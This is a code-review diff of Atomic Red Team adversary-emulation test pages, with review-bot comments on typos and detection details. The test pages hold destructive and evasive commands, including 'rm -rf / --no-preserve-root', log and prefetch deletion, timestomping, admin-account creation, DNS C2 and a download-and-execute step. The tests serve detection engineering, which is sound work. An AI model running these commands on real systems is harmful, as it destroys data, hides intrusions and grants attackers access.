This test deletes the entire root filesystem of a Linux system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment.
**Supported Platforms:** Linux
**auto_generated_guid:** f3aa95fe-4f10-4485-ad26-abf22a764c52
@@ -323,14 +339,16 @@ rm -rf / --no-preserve-root > /dev/null 2> /dev/null
<br/>
## Atomic Test #9 - Delete Prefetch File
auto_generated_guid: 36f96049-0ad7-4a5f-8418-460acaeb92fb
Delete a single prefetch file. Deletion of prefetch files is a known anti-forensic technique. To verify execution, Run "(Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" | Measure-Object).Count"
before and after the test to verify that the number of prefetch files decreases by 1.
**Supported Platforms:** Windows
**auto_generated_guid:** 36f96049-0ad7-4a5f-8418-460acaeb92fb
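Review bot: the description on this hunk should state two preconditions: deleting from `$Env:SystemRoot\prefetch` requires an elevated prompt, and Prefetch must be enabled (it is off by default on Windows Server editions, where the directory holds no .pf files and the `Measure-Object` count never changes). The "decreases by 1" verification is also fragile, because launching PowerShell and any helper executables during the test can create new .pf files between the before and after counts; comparing file names rather than the count is more reliable.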
@@ -350,17 +368,19 @@ Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$
<br/>
## Atomic Test #10 - Delete TeamViewer Log Files
auto_generated_guid: 69f50a5f-967c-4327-a5bb-e1a9a9983785
Adversaries may delete TeamViewer log files to hide activity. This should provide a high true-positive alert ration.
This test just places the files in a non-TeamViewer folder, a detection would just check for a deletion event matching the TeamViewer
log file format of TeamViewer_##.log. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.
https://twitter.com/SBousseaden/status/1197524463304290305?s=20
**Supported Platforms:** Windows
**auto_generated_guid:** 69f50a5f-967c-4327-a5bb-e1a9a9983785
#### Inputs:
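Review bot: two fixes to the description on this hunk: "alert ration" should be "alert ratio", and "Use File Explorer to verify the folder was deleted" does not match the behaviour described one sentence earlier, which creates files in a non-TeamViewer folder and deletes them; say "verify the TeamViewer_##.log files were deleted". It would also help to state explicitly that the detection should key on the file-name pattern rather than on the TeamViewer install path, since the test deliberately uses a different folder.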
+15 -9
@@ -14,13 +14,15 @@
<br/>
## Atomic Test #1 - Add Network Share
auto_generated_guid: 14c38f32-6509-46d8-ab43-d53e32d2b131
Add a Network Share utilizing the command_prompt
**Supported Platforms:** Windows
**auto_generated_guid:** 14c38f32-6509-46d8-ab43-d53e32d2b131
#### Inputs:
@@ -46,13 +48,15 @@ net share test=#{share_name} /REMARK:"test share" /CACHE:No
<br/>
## Atomic Test #2 - Remove Network Share
auto_generated_guid: 09210ad5-1ef2-4077-9ad3-7351e13e9222
Removes a Network Share utilizing the command_prompt
**Supported Platforms:** Windows
**auto_generated_guid:** 09210ad5-1ef2-4077-9ad3-7351e13e9222
#### Inputs:
@@ -77,13 +81,15 @@ net share #{share_name} /delete
<br/>
## Atomic Test #3 - Remove Network Share PowerShell
auto_generated_guid: 0512d214-9512-4d22-bde7-f37e058259b3
Removes a Network Share utilizing PowerShell
**Supported Platforms:** Windows
**auto_generated_guid:** 0512d214-9512-4d22-bde7-f37e058259b3
#### Inputs:
+40 -24
@@ -26,13 +26,15 @@ Timestomping may be used along with file name [Masquerading](https://attack.mitr
<br/>
## Atomic Test #1 - Set a file's access timestamp
auto_generated_guid: 5f9113d5-ed75-47ed-ba23-ea3573d05810
Stomps on the access timestamp of a file
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 5f9113d5-ed75-47ed-ba23-ea3573d05810
#### Inputs:
@@ -57,13 +59,15 @@ touch -a -t 197001010000.00 #{target_filename}
<br/>
## Atomic Test #2 - Set a file's modification timestamp
auto_generated_guid: 20ef1523-8758-4898-b5a2-d026cc3d2c52
Stomps on the modification timestamp of a file
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 20ef1523-8758-4898-b5a2-d026cc3d2c52
#### Inputs:
@@ -88,16 +92,18 @@ touch -m -t 197001010000.00 #{target_filename}
<br/>
## Atomic Test #3 - Set a file's creation timestamp
auto_generated_guid: 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b
Stomps on the create timestamp of a file
Setting the creation timestamp requires changing the system clock and reverting.
Sudo or root privileges are required to change date. Use with caution.
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b
#### Inputs:
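Review bot: the description on this hunk should warn about two side effects of the clock change it relies on: if NTP or another time service is running, the clock may be corrected before the file is created and the test fails quietly, and every log entry written during the window carries the bogus time, which is itself a strong forensic artifact. Suggest stating that time synchronisation must be paused and that `stat` (shown in the next hunk header) is the verification step.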
@@ -126,15 +132,17 @@ stat #{target_filename}
<br/>
## Atomic Test #4 - Modify file timestamps using reference file
auto_generated_guid: 631ea661-d661-44b0-abdb-7a7f3fc08e50
Modifies the `modify` and `access` timestamps using the timestamps of a specified reference file.
This technique was used by the threat actor Rocke during the compromise of Linux web servers.
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 631ea661-d661-44b0-abdb-7a7f3fc08e50
#### Inputs:
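Review bot: the description on this hunk correctly says only the modify and access timestamps are copied, but it should add the detection point: `touch -acmr` cannot set ctime, so the inode change time is updated to the current time and `stat` on the target will show a ctime newer than its mtime, which is the usual indicator that the timestamps were stomped.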
@@ -160,14 +168,16 @@ touch -acmr #{reference_file_path} #{target_file_path}
<br/>
## Atomic Test #5 - Windows - Modify file creation timestamp with PowerShell
auto_generated_guid: b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c
Modifies the file creation timestamp of a specified file. This technique was seen in use by the Stitch RAT.
To verify execution, use File Explorer to view the Properties of the file and observe that the Created time is the year 1970.
**Supported Platforms:** Windows
**auto_generated_guid:** b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c
#### Inputs:
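Review bot: the description on this hunk (and on Tests #6 and #7 below) should note what this method does and does not change: setting the CreationTime property from PowerShell goes through SetFileTime and rewrites only the $STANDARD_INFORMATION timestamps in the MFT record; the $FILE_NAME attribute keeps the original values, so a forensic comparison of the two attributes exposes the stomp even though File Explorer shows 1970. That is the check a detection engineer testing against this atomic will want to know about.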
@@ -210,14 +220,16 @@ Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null
<br/>
## Atomic Test #6 - Windows - Modify file last modified timestamp with PowerShell
auto_generated_guid: f8f6634d-93e1-4238-8510-f8a90a20dcf2
Modifies the file last modified timestamp of a specified file. This technique was seen in use by the Stitch RAT.
To verify execution, use File Explorer to view the Properties of the file and observe that the Modified time is the year 1970.
**Supported Platforms:** Windows
**auto_generated_guid:** f8f6634d-93e1-4238-8510-f8a90a20dcf2
#### Inputs:
@@ -260,14 +272,16 @@ Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null
<br/>
## Atomic Test #7 - Windows - Modify file last access timestamp with PowerShell
auto_generated_guid: da627f63-b9bd-4431-b6f8-c5b44d061a62
Modifies the last access timestamp of a specified file. This technique was seen in use by the Stitch RAT.
To verify execution, use File Explorer to view the Properties of the file and observe that the Accessed time is the year 1970.
**Supported Platforms:** Windows
**auto_generated_guid:** da627f63-b9bd-4431-b6f8-c5b44d061a62
#### Inputs:
@@ -310,17 +324,19 @@ Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null
<br/>
## Atomic Test #8 - Windows - Timestomp a File
auto_generated_guid: d7512c33-3a75-4806-9893-69abc3ccdd43
Timestomp kxwn.lock.
Successful execution will include the placement of kxwn.lock in #{file_path} and execution of timestomp.ps1 to modify the time of the .lock file.
[Mitre ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/master/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/defensive-evasion/4a2ad84e-a93a-4b2e-b1f0-c354d6a41278.yml)
**Supported Platforms:** Windows
**auto_generated_guid:** d7512c33-3a75-4806-9893-69abc3ccdd43
#### Inputs:
+5 -3
@@ -12,14 +12,16 @@ These actions may interfere with event collection, reporting, or other notificat
<br/>
## Atomic Test #1 - Indicator Removal using FSUtil
auto_generated_guid: b4115c7a-0e92-47f0-a61e-17e7218b2435
Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume. Upon execution, no output
will be displayed. More information about fsutil can be found at https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn
**Supported Platforms:** Windows
**auto_generated_guid:** b4115c7a-0e92-47f0-a61e-17e7218b2435
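Review bot: the description on this hunk describes `fsutil usn` in general rather than what the test does; it should name the subcommand the test runs and its effect on the volume, and state that fsutil requires an elevated prompt. Since the USN journal is consumed by Windows Search, backup and some EDR products, the description should also mention the impact of removing it and whether the cleanup recreates the journal.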
+15 -9
@@ -16,16 +16,18 @@ Protocols such as HTTP and HTTPS that carry web traffic may be very common in en
<br/>
## Atomic Test #1 - Malicious User Agents - Powershell
auto_generated_guid: 81c13829-f6c9-45b8-85a6-053366d55297
This test simulates an infected host beaconing to command and control. Upon execution, no output will be displayed.
Use an application such as Wireshark to record the session and observe user agent strings and responses.
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
**Supported Platforms:** Windows
**auto_generated_guid:** 81c13829-f6c9-45b8-85a6-053366d55297
#### Inputs:
@@ -53,16 +55,18 @@ Invoke-WebRequest #{domain} -UserAgent "*<|>*" | out-null
<br/>
## Atomic Test #2 - Malicious User Agents - CMD
auto_generated_guid: dc3488b0-08c7-4fea-b585-905c83b48180
This test simulates an infected host beaconing to command and control. Upon execution, no out put will be displayed.
Use an application such as Wireshark to record the session and observe user agent strings and responses.
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
**Supported Platforms:** Windows
**auto_generated_guid:** dc3488b0-08c7-4fea-b585-905c83b48180
#### Inputs:
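Review bot: typo in the description on this hunk, "no out put will be displayed" should be "no output will be displayed", matching the wording of Test #1 above.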
@@ -107,14 +111,16 @@ Remove-Item $env:temp\curl.zip
<br/>
## Atomic Test #3 - Malicious User Agents - Nix
auto_generated_guid: 2d7c471a-e887-4b78-b0dc-b0df1f2e0658
This test simulates an infected host beaconing to command and control.
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 2d7c471a-e887-4b78-b0dc-b0df1f2e0658
#### Inputs:
+20 -12
@@ -18,15 +18,17 @@ The DNS protocol serves an administrative function in computer networking and th
<br/>
## Atomic Test #1 - DNS Large Query Volume
auto_generated_guid: 1700f5d6-5a44-487b-84de-bc66f507b0a6
This test simulates an infected host sending a large volume of DNS queries to a command and control server.
The intent of this test is to trigger threshold based detection on the number of DNS queries either from a single source system or to a single targe domain.
A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout.
**Supported Platforms:** Windows
**auto_generated_guid:** 1700f5d6-5a44-487b-84de-bc66f507b0a6
#### Inputs:
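Review bot: typo in the description on this hunk, "single targe domain" should be "single target domain". Separately, the loop shown in the next hunk header, `for($i=0; $i -le #{query_volume}; $i++)`, runs query_volume + 1 iterations because of `-le`; use `-lt` or document that the test sends one query more than the input value, otherwise a threshold set exactly at query_volume will fire for the wrong reason.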
@@ -54,15 +56,17 @@ for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type "#{query_type}"
<br/>
## Atomic Test #2 - DNS Regular Beaconing
auto_generated_guid: 3efc144e-1af8-46bb-8ca2-1376bb6db8b6
This test simulates an infected host beaconing via DNS queries to a command and control server at regular intervals over time.
This behaviour is typical of implants either in an idle state waiting for instructions or configured to use a low query volume over time to evade threshold based detection.
A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout.
**Supported Platforms:** Windows
**auto_generated_guid:** 3efc144e-1af8-46bb-8ca2-1376bb6db8b6
#### Inputs:
@@ -93,15 +97,17 @@ Set-Location PathToAtomicsFolder
<br/>
## Atomic Test #3 - DNS Long Domain Query
auto_generated_guid: fef31710-223a-40ee-8462-a396d6b66978
This test simulates an infected host returning data to a command and control server using long domain names.
The simulation involves sending DNS queries that gradually increase in length until reaching the maximum length. The intent is to test the effectiveness of detection of DNS queries for long domain names over a set threshold.
Upon execution, DNS information about the domain will be displayed for each callout.
**Supported Platforms:** Windows
**auto_generated_guid:** fef31710-223a-40ee-8462-a396d6b66978
#### Inputs:
@@ -129,18 +135,20 @@ Set-Location PathToAtomicsFolder
<br/>
## Atomic Test #4 - DNS C2
auto_generated_guid: e7bf9802-2e78-4db9-93b5-181b7bcd37d7
This will attempt to start a C2 session using the DNS protocol. You will need to have a listener set up and create DNS records prior to executing this command.
The following blogs have more information.
https://github.com/iagox86/dnscat2
https://github.com/lukebaggett/dnscat2-powershell
**Supported Platforms:** Windows
**auto_generated_guid:** e7bf9802-2e78-4db9-93b5-181b7bcd37d7
#### Inputs:
+5 -3
@@ -14,13 +14,15 @@ The permissions required for this action vary by system configuration; local cre
<br/>
## Atomic Test #1 - Radmin Viewer Utility
auto_generated_guid: b4988cad-6ed2-434d-ace5-ea2670782129
An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console.
**Supported Platforms:** Windows
**auto_generated_guid:** b4988cad-6ed2-434d-ace5-ea2670782129
#### Inputs:
+15 -9
@@ -14,14 +14,16 @@
<br/>
## Atomic Test #1 - Stage data from Discovery.bat
auto_generated_guid: 107706a5-6f9f-451a-adae-bab8c667829f
Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution,
verify that the file is saved in the temp directory.
**Supported Platforms:** Windows
**auto_generated_guid:** 107706a5-6f9f-451a-adae-bab8c667829f
#### Inputs:
@@ -50,13 +52,15 @@ Remove-Item -Force #{output_file} -ErrorAction Ignore
<br/>
## Atomic Test #2 - Stage data from Discovery.sh
auto_generated_guid: 39ce0303-ae16-4b9e-bb5b-4f53e8262066
Utilize curl to download discovery.sh and execute a basic information gathering shell script
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 39ce0303-ae16-4b9e-bb5b-4f53e8262066
#### Inputs:
@@ -81,14 +85,16 @@ curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ato
<br/>
## Atomic Test #3 - Zip a Folder with PowerShell for Staging in Temp
auto_generated_guid: a57fbe4b-3440-452a-88a7-943531ac872a
Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip
was placed in the temp directory.
**Supported Platforms:** Windows
**auto_generated_guid:** a57fbe4b-3440-452a-88a7-943531ac872a
#### Inputs:
+5 -3
@@ -12,14 +12,16 @@ Default accounts are not limited to client machines, rather also include account
<br/>
## Atomic Test #1 - Enable Guest account with RDP capability and admin priviliges
auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0
After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group,
and desktop will allow multiple RDP connections.
**Supported Platforms:** Windows
**auto_generated_guid:** 99747561-ed8d-47f2-9c91-1e5fde1ed6e0
#### Inputs:
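Review bot: the heading in this hunk, "Enable Guest account with RDP capability and admin priviliges", misspells "privileges". These pages are generator output (see the commit title), so the spelling should be fixed in the test name at the source so the next generator run carries it through; the same misspelling appears in the "Create local account with admin priviliges" heading of the next file.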
+5 -3
@@ -12,13 +12,15 @@ Local Accounts may also be abused to elevate privileges and harvest credentials
<br/>
## Atomic Test #1 - Create local account with admin priviliges
auto_generated_guid: a524ce99-86de-4db6-b4f9-e08f35a47a15
After execution the new account will be active and added to the Administrators group
**Supported Platforms:** Windows
**auto_generated_guid:** a524ce99-86de-4db6-b4f9-e08f35a47a15
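Review bot: the heading "Create local account with admin priviliges" misspells "privileges"; fix it in the source test name rather than in this generated file. The description "After execution the new account will be active and added to the Administrators group" is also missing its terminal period.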
+55 -33
@@ -34,13 +34,15 @@ Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure a
<br/>
## Atomic Test #1 - System Information Discovery
auto_generated_guid: 66703791-c902-4560-8770-42b8a91f7667
Identify System Info. Upon execution, system info and time info will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** 66703791-c902-4560-8770-42b8a91f7667
@@ -61,13 +63,15 @@ reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum
<br/>
## Atomic Test #2 - System Information Discovery
auto_generated_guid: edff98ec-0f73-4f63-9890-6b117092aff6
Identify System Info
**Supported Platforms:** macOS
**auto_generated_guid:** edff98ec-0f73-4f63-9890-6b117092aff6
@@ -88,13 +92,15 @@ ls -al /Applications
<br/>
## Atomic Test #3 - List OS Information
auto_generated_guid: cccb070c-df86-4216-a5bc-9fb60c74e27c
Identify System Info
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** cccb070c-df86-4216-a5bc-9fb60c74e27c
#### Inputs:
@@ -128,13 +134,15 @@ rm #{output_file} 2>/dev/null
<br/>
## Atomic Test #4 - Linux VM Check via Hardware
auto_generated_guid: 31dad7ad-2286-4c02-ae92-274418c85fec
Identify virtual machine hardware. This technique is used by the Pupy RAT and other malware.
**Supported Platforms:** Linux
**auto_generated_guid:** 31dad7ad-2286-4c02-ae92-274418c85fec
@@ -161,13 +169,15 @@ if [ -x "$(command -v lscpu)" ]; then sudo lscpu | grep -i "Xen\|KVM\|Microsoft"
<br/>
## Atomic Test #5 - Linux VM Check via Kernel Modules
auto_generated_guid: 8057d484-0fae-49a4-8302-4812c4f1e64e
Identify virtual machine guest kernel modules. This technique is used by the Pupy RAT and other malware.
**Supported Platforms:** Linux
**auto_generated_guid:** 8057d484-0fae-49a4-8302-4812c4f1e64e
@@ -191,13 +201,15 @@ sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc"
<br/>
## Atomic Test #6 - Hostname Discovery (Windows)
auto_generated_guid: 85cfbf23-4a1e-4342-8792-007e004b975f
Identify system hostname for Windows. Upon execution, the hostname of the device will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** 85cfbf23-4a1e-4342-8792-007e004b975f
@@ -217,13 +229,15 @@ hostname
<br/>
## Atomic Test #7 - Hostname Discovery
auto_generated_guid: 486e88ea-4f56-470f-9b57-3f4d73f39133
Identify system hostname for Linux and macOS systems.
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 486e88ea-4f56-470f-9b57-3f4d73f39133
@@ -243,13 +257,15 @@ hostname
<br/>
## Atomic Test #8 - Windows MachineGUID Discovery
auto_generated_guid: 224b4daf-db44-404e-b6b2-f4d1f0126ef8
Identify the Windows MachineGUID value for a system. Upon execution, the machine GUID will be displayed from registry.
**Supported Platforms:** Windows
**auto_generated_guid:** 224b4daf-db44-404e-b6b2-f4d1f0126ef8
@@ -269,16 +285,18 @@ REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid
<br/>
## Atomic Test #9 - Griffon Recon
auto_generated_guid: 69bd4abe-8759-49a6-8d21-0f15822d6370
Griffon is a sophisticated tool believed to be in use by one of more "APT" groups. This atomic is for detecting, specifically, the reconnaissance part of the tool.
This script used here was reduced by security researcher Kirk Sayre (github.com/kirk-sayre-work/1a9476e7708ed650508f9fb5adfbad9d),
and it gives the exact same recon behavior as the original (minus the C2 interaction).
For more information see also e.g. https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon and https://attack.mitre.org/software/S0417/
**Supported Platforms:** Windows
**auto_generated_guid:** 69bd4abe-8759-49a6-8d21-0f15822d6370
#### Inputs:
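Review bot: two wording problems in this hunk's description: "one of more \"APT\" groups" should read "one or more", and "This script used here was reduced by" should read "The script used here was reduced by". The bare "github.com/kirk-sayre-work/1a9476e7708ed650508f9fb5adfbad9d" reference has no scheme, unlike the two https:// links on the following line; consider writing it as a full URL so it renders as a link.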
@@ -303,13 +321,15 @@ cscript #{vbscript}
<br/>
## Atomic Test #10 - Environment variables discovery on windows
auto_generated_guid: f400d1c0-1804-4ff8-b069-ef5ddd2adbf3
Identify all environment variables. Upon execution, environments variables and your path info will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** f400d1c0-1804-4ff8-b069-ef5ddd2adbf3
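Review bot: "environments variables" in the description should be "environment variables"; the same wording appears in the Test #11 description ("Environment variables discovery on macos and linux") further down this file, so fix both at the source. The heading's lowercase "windows" (and "macos and linux" in Test #11) is also inconsistent with the capitalized platform names used in the `**Supported Platforms:**` fields.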
@@ -329,13 +349,15 @@ set
<br/>
## Atomic Test #11 - Environment variables discovery on macos and linux
auto_generated_guid: fcbdd43f-f4ad-42d5-98f3-0218097e2720
Identify all environment variables. Upon execution, environments variables and your path info will be displayed.
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** fcbdd43f-f4ad-42d5-98f3-0218097e2720
+20 -12
@@ -18,14 +18,16 @@ Many command shell utilities can be used to obtain this information. Examples in
<br/>
## Atomic Test #1 - File and Directory Discovery (cmd.exe)
auto_generated_guid: 0e36303b-6762-4500-b003-127743b80ba6
Find or discover files on the file system. Upon execution, the file "download" will be placed in the temporary folder and contain the output of
all of the data discovery commands.
**Supported Platforms:** Windows
**auto_generated_guid:** 0e36303b-6762-4500-b003-127743b80ba6
@@ -51,13 +53,15 @@ tree /F >> %temp%\download
<br/>
## Atomic Test #2 - File and Directory Discovery (PowerShell)
auto_generated_guid: 2158908e-b7ef-4c21-8a83-3ce4dd05a924
Find or discover files on the file system. Upon execution, file and folder information will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** 2158908e-b7ef-4c21-8a83-3ce4dd05a924
@@ -79,9 +83,6 @@ gci -recurse
<br/>
## Atomic Test #3 - Nix File and Diectory Discovery
auto_generated_guid: ffc8b249-372a-4b74-adcd-e4c0430842de
Find or discover files on the file system
References:
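Review bot: the heading "Nix File and Diectory Discovery" misspells "Directory"; Test #4 in the same file is titled "Nix File and Directory Discovery 2", so the two headings are inconsistent as well as misspelled. Fix the test name at the source so the generated heading follows.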
@@ -89,9 +90,14 @@ References:
http://osxdaily.com/2013/01/29/list-all-files-subdirectory-contents-recursively/
https://perishablepress.com/list-files-folders-recursively-terminal/
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** ffc8b249-372a-4b74-adcd-e4c0430842de
#### Inputs:
@@ -127,13 +133,15 @@ rm #{output_file}
<br/>
## Atomic Test #4 - Nix File and Directory Discovery 2
auto_generated_guid: 13c5e1ae-605b-46c4-a79f-db28c77ff24e
Find or discover files on the file system
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** 13c5e1ae-605b-46c4-a79f-db28c77ff24e
#### Inputs:
+55 -33
@@ -32,13 +32,15 @@ Commands such as <code>net user</code> and <code>net localgroup</code> of the [N
<br/>
## Atomic Test #1 - Enumerate all accounts (Local)
auto_generated_guid: f8aab3dd-5990-4bf8-b8ab-2226c951696f
Enumerate all accounts by copying /etc/passwd to another file
**Supported Platforms:** Linux
**auto_generated_guid:** f8aab3dd-5990-4bf8-b8ab-2226c951696f
#### Inputs:
@@ -68,13 +70,15 @@ rm -f #{output_file}
<br/>
## Atomic Test #2 - View sudoers access
auto_generated_guid: fed9be70-0186-4bde-9f8a-20945f9370c2
(requires root)
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** fed9be70-0186-4bde-9f8a-20945f9370c2
#### Inputs:
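Review bot: missing documentation: the description for "View sudoers access" is only "(requires root)", which states a prerequisite but never says what the test does, unlike the neighbouring tests whose descriptions restate the action ("View accounts with UID 0", "List opened files by user"). Suggest a description sentence that mirrors the heading, e.g. "View sudoers access (requires root)."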
@@ -104,13 +108,15 @@ rm -f #{output_file}
<br/>
## Atomic Test #3 - View accounts with UID 0
auto_generated_guid: c955a599-3653-4fe5-b631-f11c00eb0397
View accounts with UID 0
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** c955a599-3653-4fe5-b631-f11c00eb0397
#### Inputs:
@@ -140,13 +146,15 @@ rm -f #{output_file} 2>/dev/null
<br/>
## Atomic Test #4 - List opened files by user
auto_generated_guid: 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb
List opened files by user
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb
@@ -166,13 +174,15 @@ username=$(id -u -n) && lsof -u $username
<br/>
## Atomic Test #5 - Show if a user account has ever logged in remotely
auto_generated_guid: 0f0b6a29-08c3-44ad-a30b-47fd996b2110
Show if a user account has ever logged in remotely
**Supported Platforms:** Linux
**auto_generated_guid:** 0f0b6a29-08c3-44ad-a30b-47fd996b2110
#### Inputs:
@@ -214,13 +224,15 @@ echo "Install lastlog on the machine to run the test."; exit 1;
<br/>
## Atomic Test #6 - Enumerate users and groups
auto_generated_guid: e6f36545-dc1e-47f0-9f48-7f730f54a02e
Utilize groups and id to enumerate users and groups
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** e6f36545-dc1e-47f0-9f48-7f730f54a02e
@@ -241,13 +253,15 @@ id
<br/>
## Atomic Test #7 - Enumerate users and groups
auto_generated_guid: 319e9f6c-7a9e-432e-8c62-9385c803b6f2
Utilize local utilities to enumerate users and groups
**Supported Platforms:** macOS
**auto_generated_guid:** 319e9f6c-7a9e-432e-8c62-9385c803b6f2
@@ -271,14 +285,16 @@ dscacheutil -q user
<br/>
## Atomic Test #8 - Enumerate all accounts on Windows (Local)
auto_generated_guid: 80887bec-5a9b-4efc-a81d-f83eb2eb32ab
Enumerate all accounts
Upon exection, multiple enumeration commands will be run and their output displayed in the PowerShell session
**Supported Platforms:** Windows
**auto_generated_guid:** 80887bec-5a9b-4efc-a81d-f83eb2eb32ab
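Review bot: "Upon exection" in this hunk's description should be "Upon execution". The two description lines also read as one sentence without punctuation ("Enumerate all accounts" followed directly by "Upon exection, ..."); a period after "Enumerate all accounts" would keep them from running together when rendered.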
@@ -302,13 +318,15 @@ net localgroup
<br/>
## Atomic Test #9 - Enumerate all accounts via PowerShell (Local)
auto_generated_guid: ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b
Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b
@@ -336,13 +354,15 @@ net localgroup
<br/>
## Atomic Test #10 - Enumerate logged on users via CMD (Local)
auto_generated_guid: a138085e-bfe5-46ba-a242-74a6fb884af3
Enumerate logged on users. Upon exeuction, logged on users will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** a138085e-bfe5-46ba-a242-74a6fb884af3
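Review bot: "Upon exeuction" in this hunk's description should be "Upon execution".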
@@ -362,13 +382,15 @@ query user
<br/>
## Atomic Test #11 - Enumerate logged on users via PowerShell
auto_generated_guid: 2bdc42c7-8907-40c2-9c2b-42919a00fe03
Enumerate logged on users via PowerShell. Upon exeuction, logged on users will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** 2bdc42c7-8907-40c2-9c2b-42919a00fe03
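Review bot: "Upon exeuction" in this hunk's description should be "Upon execution"; this is the same typo as in Test #10 above, so it is probably copied between the two test definitions and should be fixed in both.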
+50 -30
@@ -30,14 +30,16 @@ Commands such as <code>net user /domain</code> and <code>net group /domain</code
<br/>
## Atomic Test #1 - Enumerate all accounts (Domain)
auto_generated_guid: 6fbc9e68-5ad7-444a-bd11-8bf3136c477e
Enumerate all accounts
Upon exection, multiple enumeration commands will be run and their output displayed in the PowerShell session
**Supported Platforms:** Windows
**auto_generated_guid:** 6fbc9e68-5ad7-444a-bd11-8bf3136c477e
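Review bot: "Upon exection" should be "Upon execution", and the two description lines need a period between "Enumerate all accounts" and "Upon exection, ..." so they do not render as one run-on sentence. This description is identical to the local-account Test #8 in the previous file, so fix both.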
@@ -58,13 +60,15 @@ net group /domain
<br/>
## Atomic Test #2 - Enumerate all accounts via PowerShell (Domain)
auto_generated_guid: 8b8a6449-be98-4f42-afd2-dedddc7453b2
Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** 8b8a6449-be98-4f42-afd2-dedddc7453b2
@@ -86,13 +90,15 @@ get-aduser -filter *
<br/>
## Atomic Test #3 - Enumerate logged on users via CMD (Domain)
auto_generated_guid: 161dcd85-d014-4f5e-900c-d3eaae82a0f7
Enumerate logged on users. Upon exeuction, logged on users will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** 161dcd85-d014-4f5e-900c-d3eaae82a0f7
#### Inputs:
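Review bot: "Upon exeuction" in this hunk's description should be "Upon execution".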
@@ -117,14 +123,16 @@ query user /SERVER:#{computer_name}
<br/>
## Atomic Test #4 - Automated AD Recon (ADRecon)
auto_generated_guid: 95018438-454a-468c-a0fa-59c800149b59
ADRecon extracts and combines information about an AD environement into a report. Upon execution, an Excel file with all of the data will be generated and its
path will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** 95018438-454a-468c-a0fa-59c800149b59
#### Inputs:
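Review bot: "AD environement" in this hunk's description should be "AD environment". The hard line break after "its" ("... will be generated and its" / "path will be displayed.") also splits the sentence awkwardly; keep it on one line or break before "and its path".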
@@ -166,14 +174,16 @@ Invoke-WebRequest -Uri "https://raw.githubusercontent.com/sense-of-security/ADRe
<br/>
## Atomic Test #5 - Adfind -Listing password policy
auto_generated_guid: 736b4f53-f400-4c22-855d-1a6b5a551600
Adfind tool can be used for reconnaissance in an Active directory environment. The example chosen illustrates adfind used to query the local password policy.
reference- http://www.joeware.net/freetools/tools/adfind/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx
**Supported Platforms:** Windows
**auto_generated_guid:** 736b4f53-f400-4c22-855d-1a6b5a551600
#### Inputs:
